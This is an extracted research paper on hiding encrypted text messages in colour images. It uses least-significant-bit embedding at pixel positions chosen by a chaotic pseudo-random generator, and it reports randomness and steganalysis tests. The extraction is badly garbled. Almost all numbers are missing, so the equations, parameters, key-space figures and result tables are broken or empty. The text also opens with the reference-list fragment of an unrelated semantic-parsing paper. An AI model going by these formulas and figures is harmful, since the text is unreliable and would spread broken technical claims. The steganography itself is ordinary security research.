chang. . s-mart: novel tree-based structured learning algorithms applied to tweet entity linking. in proceedings of association for computational linguistics, pages – . xuchen yao and benjamin van durme. . informa- tion extraction over structured data: question answer- ing with freebase. in proceedings of association for computational linguistics, pages – . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. . answer extraction as sequence tagging with tree edit distance. in proceedings of north american chapter of the association for compu- tational linguistics, pages – . xuchen yao. . lean question answering over free- base from scratch. in proceedings of north american chapter of the association for computational linguis- tics, pages – . wen-tau yih, ming-wei chang, xiaodong he, and jian- feng gao. . semantic parsing via staged query graph generation: question answering with knowl- edge base. in proceedings of association for compu- tational linguistics, pages – . john m. zelle and raymond j. mooney. . learning to parse database queries using inductive logic pro- gramming. in proceedings of association for the ad- vancement of artificial intelligence, pages – . luke s. zettlemoyer and michael collins. . learning to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in proceedings of uncertainty in artificial intelligence, pages – . hao zhang and ryan mcdonald. . enforcing struc- tural diversity in cube-pruned dependency parsing. in proceedings of association for computational linguis- tics, pages – . steganography in color images with random order of pixel selection and encrypted text message embedding steganography in color images with random order of pixel selection and encrypted text message embedding krasimir kordov and stanimir zhelezov department of computer informatics, faculty of mathematics and computer science, konstantin preslavski university of shumen, shumen, shumen, bulgaria department of computer systems and technologies, faculty of mathematics and computer science, konstantin preslavsky university of shumen, shumen, shumen, bulgaria abstract information security is major concern in modern digital ages, and the outdated algorithms need to be replaced with new ones or to be improved. in this article a new approach for hiding secret text message in color images is presented, combining steganography and cryptography. the location and the order of the image pixels chosen for information embedding are randomly selected using chaotic pseudo- random generator. encrypting the secret message before embedding is another level of security designed to misguide the attackers in case of analyzing for traces of steganography. evaluating the proposed stegoalgorithm. the standard statistical and empirical tests are used for randomness tests, key-space analysis, key-sensitivity analysis, visual analysis, histogram analysis, peak signal-to-noise ratio analysis, chi-square analysis, etc. the obtained results are presented and explained in the present article. subjects algorithms and analysis of algorithms, cryptography, multimedia, security and privacy keywords steganography, text encryption, color images steganography, least-significant bit steganography, steganographic analysis introduction steganology is an ancient science that is becoming more and more widely used with the development of digital information. it consists of two main areas: steganography and steganalysis. steganography is an interdisciplinary applied science field (cox et al., ; stanev & szczypiorski, ), a set of technical skills and art for ways to hide the fact of transmission (presence) of information. it is one of the most effective approaches to protecting important information by hiding it (data hiding). high-tech steganography summarizes the areas for hiding messages using communication and computer technology, nanotechnology and modern advances in sciences such as biology, chemistry and others (wu et al., ; koptyra & ogiela, ; abd-el-atty et al., ). steganalysis has exactly the opposite task. it combines methods and technologies for detecting secret steganographic communications. along with the beginning of the development of modern ways of hiding information, at the end of the th century research in the field of steganalysis (johnson & jajodia, ; provos & honeyman, ; how to cite this article kordov k, zhelezov s. . steganography in color images with random order of pixel selection and encrypted text message embedding. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published january corresponding author krasimir kordov, krasimir.kordov@shu.bg academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright kordov and zhelezov distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:krasimir.�kordov@�shu.�bg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ fridrich & goljan, ) has begun. steganalysis is divided into two main categories: blind and targeted (zhelezov, ). targeted steganalysis methods have been developed to detect data embedded with specific stegoalgorithms and they are very accurate against certain stegomethods. the blind analysis methods are based on algorithms that require prior “training” with a series of empty and filled containers. the most characteristic of both types of analysis is that their methods are based on statistical dependencies in the analyzed subjects (nissar & mir, ). such a method is pov (pairs of values) as part of the chi-square analysis (westfeld & pfitzmann, ; fridrich, goljan & du, ). related work one of the latest research which shows successful optical character recognition (ocr) steganography technique with good results in steganalysis, is presented in (chatterjee, ghosal & sarkar, ). other example of resent steganographic research is described in (pak et al., ), where the authors are using chaotic map for constructing a steganographic algorithm. popular methods for image steganography are analyzed in table . the main task of the steganographic algorithm is to reduce the efficiency of such methods and thus to increase its reliability. for this purpose, it is necessary to choose a method of embedding that does not violate the statistical dependencies. for this reason, a spread spectrum steganography approach (marvel, boncelet & retter, ; satish et al., ) based on a pseudo-random sequence generator has been chosen in this article. additional text encryption is applied for transforming the secret message into unreadable character sequence for increasing the level of security of the proposed steganographic algorithm. in this approach, the resulting pseudo-random sequences are used to determine the message embedding positions. this leads to preserving the statistical dependencies in the container. another advantage of this approach is related to some types of targeted steganalysis. they extract the values of the smallest bits of the file sequentially and analyze them for repetitive sequences. with the embedding method proposed in the article this type of steganalysis is completely ineffective. motivation and justification the text messages and the digital images are the most used information carriers concerning the data flow in the internet and mobile communications. there are thousand of chat applications designed for short text messages correspondence using different ways to secure the communications between the users. variety of cryptographic algorithms are implemented in order to protect the transferred information. unfortunately, some of the encryption methods have become outdated and the new ones are being invented to improve secure communication. information security will always be a major concern that motivates the development of new secret methods for data distribution and real-time communication. such method is proposed in this work by combining two general scientific areas: steganography and cryptography. kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table survey of some recent stego research. reference marvel, boncelet & retter ( ) method the method uses a fast compressed-domain embedding technique to facilitate on-the-fly compressed-domain public-key steganography notes low probability of detection and leaving an observer unaware that the hidden data exist. the method works with grayscale images reference satish et al. ( ) method the method is based on a scheme of chaos based spread spectrum image steganography (cssis) involving the use of chaotic encryption and chaotic modulation in spread spectrum image steganography (ssis) notes a novel scheme of the use of chaos based encryption. robustness is achieved by interleaving the message using a chaotic sequence reference baby et al. ( ) method the method is based on hiding multiple color images into a single color image using the discrete wavelet transform notes dwt increases the payload of the steganographic process by data compression. the proposed approach provides a good psnr and ssim value which establish the robustness of this work reference amirulhaqi, purboyo & nugrahaeni ( ) method the method is based on spread spectrum steganography and the vigenere cipher embedding in gif images notes the method consists of three processes, namely the spreading, modulation, and insertion of a gif image to the message reference yadav & dutta ( ) method the method is based on spread spectrum image steganography with rsa message encryption. notes high level of security. spreading the message all over the pixels of the cover media using pseudo random generator that generates random locations of pixels in an image and embedding message with least significant bit algorithm to make it highly indiscernible reference gaurav & ghanekar ( ) method the method presents a steganography algorithm based on local reference edge detection technique and exclusive disjunction in the sharp edge region compared to the uniform region of the image notes this paper presents an improved steganography technique on the basis of hvs system with an improved xor technique reference chatterjee, ghosal & sarkar ( ) method the method is based on optical character recognition (ocr) based steganographic technique. notes advantages—indicating correct classification by the model and high psnr values. the method works with grayscale images. slow embedding process for large images reference pak et al. ( ) method the method is based on an improved d chaotic system model notes the conventional one-dimensional ( d) chaotic map has a simple structure, which is easy to implement and has a low computational cost. the algorithm shows a good performance against statistical analysis attacks. conventional one-dimensional ( d) chaotic map has a drawback that the range of chaotic behaviors is narrow and the distribution of key sequence is uniform kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an outline of the proposed work our main focus is to present a different approach for classic lsb steganography in images using random order of pixel selection and embedding encrypted text message. in order to achieve our goal the proposed technique requires the following steps: � constructing novel pseudo-random generator � secure text encryption, using the constructed pseudo-random generator � choosing random pixels (in chaotic order) from an image, using the constructed pseudo- random generator for embedding information � using traditional lsb pixel’s color modification for hiding, leaving no traces of steganography. pseudo-random generator based on duffing map and circle map for random pixel selection we are using pseudo-random generator (prg) described in this section. pseudo-random generators (also called pseudo-random number generators (prng)) are software realized and unlike true-random generators (trg) are easy for implementation with significantly lower cost and time consumption. this is why they are often used in cryptographic and steganographic systems. examples of prgs can be found in (kordov, , b). the requirement resistance of prgs is to different types of attacks are discussed in this section. duffing map description the duffing map is well known two dimensional non-linear discrete-time dynamical system with chaotic behavior (holmes & moon, ) which is a discrete version of duffing oscillator (van dooren, ). duffing map is given by: xtþ ¼ yt ytþ ¼ �bxt þ ayt � y t ; ( ) where xt and yt are double variables, calculated on every iteration, and a and b are fixed parameters of the duffing map. for chaotic behavior the parameters are set to a = . and b = . (hasan et al., ; riaz et al., ). the initial test values we used for variables are x = − . and y = . and fig. is a graphical representation of the duffing map with the described values. circle map description the circle map is explored for chaotic behavior in shenker ( ) and deguzman & kelso ( ). it has random-like properties and is suitable for constructing prgs (kordov, a). the standard circle map equation is: uiþ ¼ ðui þ � � k p sinð puiÞÞ mod ; ( ) where θ is a double variable and Ω and k are the controlling parameters with values kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ Ω = . , k = . . the initial value for the variable we used for experiments in this article is θ = − . . figure is a graphical representation of the circle map with the described values. - - . - - . . . x(t) - - . - - . . . y( t) figure duffing map plot with a = . , b = . , x = − . and y = . . full-size doi: . /peerj-cs. /fig- i - . - . . . . . . figure circle map plot with Ω = . , k = . and θ = − . . full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ random bit extraction process the proposed bit extraction process is using eqs. ( ) and ( ) and contains the following steps: � the initial values of the constant parameters from eqs. ( ) and ( ) are determined and the initial values of the double variables are set (described in the previous sections). � for additional security, first n iterations from eq. ( ) and first m iterations from eq. ( ) are skipped. (we randomly chose n = m = ). � on every iteration of eq. ( ), xt and yt are used for calculation of additional double variable pt: temp t ¼ jintegerðxt � Þjmod ; temp t ¼ jintegerðyt � Þjmod ; pt ¼ temp xor temp ( ) and θi from eq. ( ) is used for calculation of the variable qt: qt ¼ jintegerðut � Þjmod ( ) � the produced random bit is obtained by performing xor operation between the variables pt and qt. � the previous two steps are repeated until the necessary random binary sequence is reached. key-sensitivity analysis this test is performed to determine the behavior of the proposed prg if there are changes in the secret key that is used to produce binary sequences. to test the key sensitivity very similar secret keys are used (described in table ) by changing a single digit in one of the initial double variables. the results of the experiment are graphically presented in fig. and clearly show that the final binary sequence is different every time even if the secret keys are very table secret keys values. secret variable values key x y θ k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar. this means the proposed prg is very sensitive to any changes in the initial conditions. key-space analysis the key-space includes the variety of possible values of the used variables in random bit generation. equation ( ) has two initial variables that can have different values (x and y ) and eq. ( ) has one variable −θ . the parameters from the equations are constant so they cannot be part of the secret key. in addition to the secret key, the integer values of n and m also can have different values. considering the floating point standard of ieee for double variables (ieee computer society, ) every double variable has precision about − . combining the three variables we have ( ) ≈ plus ( ) for the two integer variables and final about for key-space. the required key-space for resisting brute-force attacks is (alvarez & li, ) which means that the proposed prg is secure enough. kay-space comparison is presented in table . figure circle map plot with Ω = . , k = . and θ = − . . (a) plot of binary sequence using secret key k . (b) plot of binary sequence using secret key k . (c) plot of binary sequence using secret key k . (d) plot of binary sequence using secret key k . (e) plot of binary sequence using secret key k . (f) plot of binary sequence using secret key k . (g) plot of binary sequence using secret key k . full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ randomness evaluation the most important property of a prg is to produce random binary numbers. to evaluate the randomness billion bits are generated and the sequence is tested with the most popular statistical test software packages. nist—random test the first software for randomness evaluation is nist—statistical test suite (bassham et al., ) and includes base tests. the testing process is performed by dividing the tested sequence into , subsequences with length of , , bits. all the nist need to have p-values in the range [ , ) to be considered for successfully passed. the results for all tests are summarized in table . diehard—ramdom test the second test package is diehard software (marsaglia, ) and contains test for randomness. the tests applied for the same bitstream of billion bits generated by our prg. the acceptable range again for calculated p-values is [ , ) for passing the individual tests. the results for all tests are summarized in table . all the tests in table have p-values in range [ , ), indicating that all the tests for randomness evaluation are passed. ent—ramdom test the ent statistical test software (walker, ) is the last package we used for randomness evaluation. the ent software tests are: entropy test, optimum compression test, χ distribution test, arithmetic mean value test, monte carlo π estimation test, and serial correlation coefficient test. in table are presented the results for all tests from ent software. steganography in color images with random pixel selection the proposed method combines the classical least-significant bit (lsb) value replacement by choosing random positions of hiding in the image. the random order and the message encryption is performed by the proposed prg. message embedding algorithm the process is performed by the following steps: . the text information is transformed to vector v of binary sequence using ascii table values of the characters. table key-space comparison of prgs. reference key-space kordov ( a) kordov ( ) kordov ( b) proposed kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . control character sequence marking the end of the secret message is converted also in binary sequence and added to the vector v. (in our case we used “*#”). . the binary sequence in vector v is encrypted using xor operation and random sequence produced by prg with secret key . the result vector is v′. . the proposed prg is used with the secret key to produce two times bits for selecting random position in an image with following rule: x position ¼ integerð bitsÞ mod image width; y position ¼ integerð bitsÞ mod image height ( ) . if a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. . lsb technique is used for embedding three bits from vector v′ into red, green and blue color values of the selected pixel. . steps – are repeated until the sequence from vector v′ is embedded into the final stego image. message extraction algorithm the process is performed by the following steps: . the proposed prg is used with the secret key to produce two times bits for selecting random position in the image with the following rule: x position ¼ integerð bitsÞ mod image width; y position ¼ integerð bitsÞ mod image height ( ) . if a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. . the lsb values from red, green and blue colors are copied into vector v′. . every bits are transformed into char value and every last two obtained characters are compared with the control sequence that marks the end of the message (“*#”). . steps – are repeated until the control sequence is reached. . the binary sequence in vector v′ is decrypted using xor operation and random sequence produced by prg with secret key . the result vector is v′. . vector v is transformed from binary sequence into ascii chars equivalent forming the original hidden text message. experimental setup for our empirical experiments we used . ghz intel core i - qm dell inspiron laptop with gb ram, x windows pro operating system. the proposed method is realized using c++ programing language and the test images are personal photos taken within our university region. sixteen color images are selected— with dimensions × and with dimensions × . matlab r a software is used for histogram plotting and image analysis and processing. the initial values used for prg are x = − . , y = . , θ = − . and for n and m − . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steganographic analysis in this section, the most used tests for steganographic analysis are included for testing the proposed stego algorithm. the color images are tested by embedding secret messages with different length. the messages are random only for the experiments and contain letters ( bits), letters ( , bits), letters ( , bits), letters ( , bits), letters ( , bits), , letters ( , bits), and , letters ( , bits). all the test in supplemental file and . visual analysis this is the most mandatory test for steganographic algorithm. a necessary requirement for any stego algorithm is to leave no visual traces of embedded secret messages or message container changes. figure shows one of the test images with its corresponding stego images with different lengths of embedded information. figure clearly demonstrates that there are no visual differences between the images and no traces of hidden messages. more examples are presented in fig. , to confirm that there are no visual trace of steganography in corresponding stego images. histogram analysis the image histograms are used for graphical representation of the tonal distribution of the red, green and blue colors. this experiment is designed to analyze if there are any changes in color distribution when the proposed steganographic method is applied. table nist test suite results. the minimum pass rate for each statistical test with the exception of the random excursion (variant) test is approximately = for a sample size = , binary sequences. the minimum pass rate for the random excursion (variant) test is approximately = for a sample size = binary sequences. nist test p-value pass rate frequency . / , block-frequency . / , cumulative sums (forward) . / , cumulative sums (reverse) . / , runs . / , longest run of ones . / , rank . / , fft . / , non-overlapping templates . / , overlapping templates . / , universal . / , approximate entropy . / , random-excursions . / random-excursions variant . / serial . / , serial . / , linear complexity . / , kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the histograms of a test image with its corresponding stego images and table shows average pixel intensity values. the histogram attack method (fridrich & goljan, ) is historically the first statistical attack described in the resources. it is based on the fact that with lsb embedding, the even pixel values either remain unchanged (unmodified) or are being increased by , while the odd pixel values either remain unchanged or decrease. thus, the values ( i, i + ) form a pair of values (pov), which are exchanged during embedding. this asymmetry in the embedding function can be used and a statistical test applied to confirm or deny that the table diehard statistical test results. diehard test p-value birthday spacings . overlapping -permutation . binary rank ( × ) . binary rank ( × ) . binary rank ( × ) . bitstream . opso . oqso . dna . stream count-the-ones . byte count-the-ones . parking lot . minimum distance . d spheres . squeeze . overlapping sums . runs up . runs down . craps . table ent statistical test results. ent test result entropy . bits per byte optimum compression oc would reduce the size of this , , byte file by % χ distribution for , , samples is . , and randomly would exceed this value . % of the times arithmetic mean value . ( . = random) monte carlo π estimation . (error . %) serial correlation coefficient − . (totally uncorrelated = . ) kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ even values follow the known distribution. the statistical steganalysis based on the chi-square method is based on this. it makes a histogram (the frequency of occurrence of each color in the image) of the color distribution and based on it, pairs of adjacent values (pov) are formed, differing in the youngest bit. then a theoretical histogram of the color distribution is made, showing the expected distribution of the values in the presence of hidden information and pairs of adjacent values are formed again. the difference between the observed and expected occurrence frequencies for each pair is sought. in our case the observation of fig. shows that the tonal distribution is not changed when the secret messages are hidden in the plain image. peak signal-to-noise ratio and structural similarity analysis the peak signal-to-noise ratio (psnr) measure the possible maximum power of the clean signal against the power of the noise signal. poorly changing the pixel values of an image can lead to corruption of the image quality which may uncover a possible steganography. psnr is calculated using the following equation: psnr ¼ log max mse ðdbÞ; ( ) where max is the maximum possible value of the pixel color. considering that every pixel has bits for red, green and blue color, we use the average value of the three values figure visual comparison of a container image and corresponding stego images. (a) container color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. the photos were taken by the authors. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ meaning max = − = . mse is the mean square error between the plain and stego images defined as: mse ¼ nm xn i¼ xm j¼ ðpx;y � sx;yÞ ( ) where px,y and sx,y are the corresponding pixel values from the plain and stego images, respectively. considering the color images have red, green and blue values for every pixel, the (px,y − sx,y) is calculated by: ðrvalueplain−rvaluestegoÞ þ ðgvalueplain−gvaluestegoÞ þ ðbvalueplain−bvaluestegoÞ ( ) the structural similarity (ssim) is another method used in steganographic analysis proposed and described in wang et al. ( ). the test is designed to determine the similarity between two images, in our case the similarity between plain and corresponding stego images. values close to are indicators for the best possible structural similarity between the compared images. part of the obtained values for mse, psnr and ssim are shown in table . the mse and psnr values are calculated for images with chars ( bits), , chars a) e) b) f) c) g) d) h) figure additional examples of the proposed steganographic scheme. (a) container image—main corpus. (b) container image—monument. (c) container image—solarpanels. (d) container image—fitness. (e) stego image—main corpus. (f) stego image—monument. (g) stego image— solar panels. (h) stego image—fitness. the photos were taken by the authors. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( , bits), and , chars ( , bits) embedded. all the results are available in supplemental file . table shows high values for psnr (over db) meaning the stego algorithm do not destroy the image quality with considered minimum requirement of – db for low quality. the obtained values for ssim are close to the best possible value − . additional metrics analysis some researchers use different metrics for steganographic analysis of their methods. for evaluation of the proposed algorithm we performed additional experiments for the most used indicators—average difference (ad), structural content (sc), normalized cross-correlation (ncc), maximum difference (md), laplacian mean squared error (lmse), normalized absolute error (nae), image quality index (iqi). the best possible value for sc, ncc, md and iqi is and for ad, lmse and nae is . the results for our method are presented in table . all the results are available in supplemental file . the obtained results in table show results close to the perfect values demonstrating the stability and efficiency of the proposed stegoalgorithm. figure histogram analysis of a plain image and corresponding stego images. (a) container color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table the mse, psnr and ssim values for images with chars ( bits), , chars ( , bits), and , chars ( , bits) embedded. file name stego image with chars embbeded stego image with , chars embbeded stego image with , chars embbeded mse psnr ssim mse psnr ssim mse psnr ssim f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . table average pixel intensity comparison. file name plain image red stego image red plain image green stego image green plain image blue stego image blue f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison in order to compare the proposed method with other image steganographic algorithms we use the presented metrics (where available) in related articles. the main metrics for defining the security and the reliability of the stegomethods are related to preserving the quality of the cover images and keeping the similarity with the stego images. for the image quality estimation the psnr and mse metrics are applied, and for the similarity of the cover and corresponding stego images—ssim metric. the following table contains the most used metrics. the test results in table show that the presented algorithm has satisfying statistical properties and provides better security level than compared methods. chi-square analysis in this article, steganalytic software based on the chi-square method is used (available at http://www.guillermito .net/stegano/tools/index.html). the software graphically shows the positions of the pixel values according to the image chi-square value of the tested image. the red curve indicates the chi-square values of the tested images and the green values represent the average value of the lsbs. if the green values are below the red curve the test didn’t pass successfully. otherwise, it is assumed that the test was passed successfully, that is, there are no indications of a hidden message. for visual comparison we constructed a single screen shot image with six diagrams containing the results of the software. table the average difference (ad), structural content (sc), normalized cross-correlation (ncc), maximum difference (md), laplacian mean squared error (lmse), normalized absolute error (nae), image quality index (iqi). file name ad sc ncc md lmse nae iqi f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x − . . . . . . . f - x − . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x − . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . f - x . . . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://www.guillermito .net/stegano/tools/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure demonstrates the results of our tests. the first is a diagram of the container and below are the corresponding stego files. the red curve is constantly at zero value leaving no green point under it. the chi-square tests show that there is no trace of steganography in the stego files, indicated that the proposed algorithm can withstand against chi-square attacks. computational and complexity analysis the proposed algorithm is tested with the conditions described in experimental setup section. concerning the complexity of our method, it is defined by the computations and iterations of the calculations for encryption and embedding operations. considering the linear computation of every operation(random numbers generation, lsb modification table average obtained values for psnr, mse and ssim. reference average psnr average mse average ssim proposed . . . chatterjee, ghosal & sarkar ( ) . . . yadav & dutta ( ) . . – amirulhaqi, purboyo & nugrahaeni ( ) . . – baby et al. ( ) . – . gaurav & ghanekar ( ) . . . a) b) c) d) e) f) figure chi-square analysis of a container image and the corresponding stego images. (a) con- tainer color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ etc.) do not affect the complexity, the theoretical complexity of the proposed scheme is θ( * n) equated to θ(n), where n defines the input data of the algorithm. the input data of the algorithm is the secret message for embedding which is processed as bit sequence ( bits for a character). the image parameters (width and height) do not increase the time consumption, because the number of random selected pixels depends only from the length of the embedded secret message. however, the images size is related to the memory consumption. the following table summarizes the results of our empirical experiment for embedding different size of secret text messages. the results in table show that the proposed method is very fast and the computational complexity depends entirely of the secret text length. conclusions in this manuscript a new method for steganography is presented. the base of the proposed algorithm is a prg used for secret message encryption and random pixels selection for data embedding. proving the level of security the prg is statistically tested for randomness and key-sensitivity, and the key-space analysis defines a necessary level of brute-force attacks resistance with minimum requirement for key-space. the steganographic algorithm is evaluated with visual analysis, file size comparison, histogram analysis and chi-square analysis and the results show that there are no traces of steganography when a secret message is hidden in the tested color images. the psnr table time complexity for secret text message encryption/decryption and embedding/extracting in color images. file name file dimensions length of the secret message chars chars , chars , chars , chars bits (s) , bits (s) , bits (s) , bits (s) , bits (s) f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . f - x .bmp × . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analysis indicates that the quality of the signal in stego images remains high, considered that the good quality of the signal is above db. additional tests indicates high similarity between cover and the corresponding stego images for proving the security and the reliability of the proposed scheme. the presented method can be improved for real-time video communication with embedded data. additional information and declarations funding this research is supported by the european regional development fund and the operational program “science and education for smart growth” under contract unite no. bg m op - . - -c ( – ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european regional development fund: bg m op - . - -c ( – ). competing interests the authors declare that they have no competing interests. author contributions � krasimir kordov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � stanimir zhelezov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the source code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abd-el-atty b, iliyasu am, alaskar h, el-latif a, ahmed aa. . a robust quasi-quantum walks-based steganography protocol for secure transmission of images on cloud-based e-healthcare platforms. sensors ( ): doi . /s . alvarez g, li s. . some basic cryptographic requirements for chaos-based cryptosystems. international journal of bifurcation and chaos ( ): – doi . /s . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ amirulhaqi a, purboyo tw, nugrahaeni ra. . security on gif images using steganography with lsb method, spread spectrum and the vigenere cipher. international journal of applied engineering research ( ): – . baby d, thomas j, augustine g, george e, michael nr. . a novel dwt based image securing method using steganography. procedia computer science : – doi . /j.procs. . . . bassham l iii, rukhin a, soto j, nechvatal j, smid m, barker e, leigh s, levenson m, vangel m, banks d, heckert a, dray j, vo s. . sp - rev. a. a statistical test suite for random and pseudorandom number generators for cryptographic applications. gaithersburg: national institute of standards & technology doi . /nist.sp. - r a. chatterjee a, ghosal sk, sarkar r. . lsb based steganography with ocr: an intelligent amalgamation. multimedia tools and applications ( – ): – doi . /s - - - . cox i, miller m, bloom j, fridrich j, kalker t. . digital watermarking and steganography. second edition. burlington: morgan kaufmann publishers. deguzman gc, kelso jas. . multifrequency behavioral patterns and the phase attractive circle map. biological cybernetics ( ): – doi . /bf . fridrich j, goljan m. . practical steganalysis of digital images: state of the art. security and watermarking of multimedia contents iv, international society for optics and photonics : – . fridrich j, goljan m, du r. . detecting lsb steganography in color, and gray-scale images. ieee multimedia ( ): – doi . / . . gaurav k, ghanekar u. . image steganography based on canny edge detection, dilation operator and hybrid coding. journal of information security and applications : – doi . /j.jisa. . . . hasan mm, faruqi tm, tazrean m, chowdhury th. . biometric encryption using duffing map. in: th international conference on advances in electrical engineering (icaee). – . holmes pj, moon fc. . strange attractors and chaos in nonlinear mechanics. journal of applied mechanics ( b): – doi . / . . ieee computer society. . ieee standard for floating-point arithmetic. in: ieee std - . piscataway: ieee, – . johnson n, jajodia s. . steganalysis of images created using current steganography software. in: international workshop on information hiding. – . koptyra k, ogiela mr. . distributed steganography in pdf file—secrets hidden in modified pages. entropy ( ): doi . /e . kordov k. a. modified pseudo-random bit generation scheme based on two circle maps and xor function. applied mathematical sciences : – doi . /ams. . . kordov k. b. signature attractor based pseudorandom generation algorithm. advanced studies in theoretical physics ( ): – doi . /astp. . . kordov km. . modified chebyshev map based pseudo-random bit generator. aip conference proceedings : – . marsaglia g. . the marsaglia random number cdrom including the diehard battery of tests of randomness. tallahassee: florida state university. marvel lm, boncelet cg, retter ct. . spread spectrum image steganography. ieee transactions on image processing ( ): – doi . / . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /nist.sp. - r a http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /e http://dx.doi.org/ . /ams. . http://dx.doi.org/ . /astp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nissar a, mir 